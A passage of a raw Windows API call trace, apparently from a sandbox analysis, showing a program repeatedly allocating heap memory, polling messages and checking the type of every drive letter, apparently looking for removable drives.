lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0209.995] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0210.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0210.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.034] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.034] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0210.034] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0210.034] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.034] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.034] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.035] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.035] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.035] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0210.035] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.035] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0210.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.035] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.035] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.036] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.036] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.036] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.036] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.036] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.036] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.037] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.037] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.037] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.037] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.037] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.038] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.038] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.038] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.038] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.038] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.038] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.039] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.039] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.039] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.039] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.039] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.040] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.040] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.040] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0210.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0210.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0210.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0210.041] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0210.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0210.041] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0210.041] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0210.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.042] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0210.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.042] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.042] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0210.042] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0210.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.043] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.043] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.043] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.043] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.043] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.043] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.044] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.044] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.044] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.044] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.045] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.045] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.045] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.045] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.045] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.046] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.046] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.046] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.046] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.046] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.047] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.047] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.047] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.047] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.047] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.048] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.048] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0210.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.048] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0210.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0210.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0210.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0210.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0210.049] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0210.049] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.049] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0210.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0210.050] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.050] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.050] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0210.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.050] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.050] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.051] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.051] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.051] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.051] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.051] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.051] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.052] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.052] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.052] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.052] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.052] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.053] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.053] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.053] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.053] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.053] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.053] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.054] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.054] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.054] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.054] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.055] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.055] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.055] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.055] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0210.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.056] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0210.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.056] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 